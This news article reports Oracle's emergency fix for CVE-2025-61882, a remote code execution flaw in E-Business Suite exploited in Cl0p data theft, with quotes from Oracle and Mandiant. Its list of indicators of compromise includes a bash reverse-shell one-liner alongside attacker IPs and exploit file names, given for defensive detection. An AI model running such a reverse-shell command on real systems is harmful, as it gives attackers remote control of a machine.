Oracle released an emergency update to fix a critical security flaw in its E-Business Suite. The company confirmed that attackers from the recent wave of Cl0p data theft operations exploited this vulnerability.
The vulnerability, tracked as CVE-2025-61882 (CVSS score: 9.8), involves an unspecified bug that allows an unauthenticated attacker with network access via HTTP to compromise and take control of the Oracle Concurrent Processing component.
“This vulnerability is remotely exploitable without authentication, i.e., it may be exploited over a network without the need for a username and password,” Oracle said in an advisory. “If successfully exploited, this vulnerability may result in remote code execution.”
In a separate alert, Oracle’s Chief Security Officer Rob Duhart explained that the company released fixes for CVE-2025-61882 to “provide updates against additional potential Exploitation that were discovered during our investigation.”
As part of its analysis, Oracle shared several indicators of compromise (IoCs). These include IP addresses and Artifacts that point to possible involvement by the Scattered LAPSUS$ Hunters group in the exploit:
- 200.107.207[.]26 (Potential GET and POST activity)
- 185.181.60[.]11 (Potential GET and POST activity)
- sh -c /bin/bash -i >& /dev/tcp// 0>&1 (Establishes an outbound TCP connection over a specific port)
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py
Furthermore, news of the Oracle Zero-day Surfaced only days after reports revealed a new campaign likely carried out by the Cl0p Ransomware group targeting Oracle E-Business Suite. Google-owned Mandiant described this operation as a “High-volume email campaign” Launched from Hundreds of compromised accounts.
In a LinkedIn post, Charles Carmakal, CTO of Mandiant at Google Cloud, stated that “Cl0p exploited multiple vulnerabilities in Oracle EBS which enabled them to steal large amounts of data from several victims in August 2025,” adding that “multiple vulnerabilities were exploited including vulnerabilities that were patched in Oracle’s July 2025 update as well as one that was patched this weekend (CVE-2025-61882).”
Carmakal emphasized the urgency of response, noting, “Given the broad mass zero-day exploitation that has already occurred (and the n-day exploitation that will likely continue by other actors), irrespective of when the patch is applied, organizations should examine whether they were already compromised.”
Source: TheHackerNews
Read more at Impreza News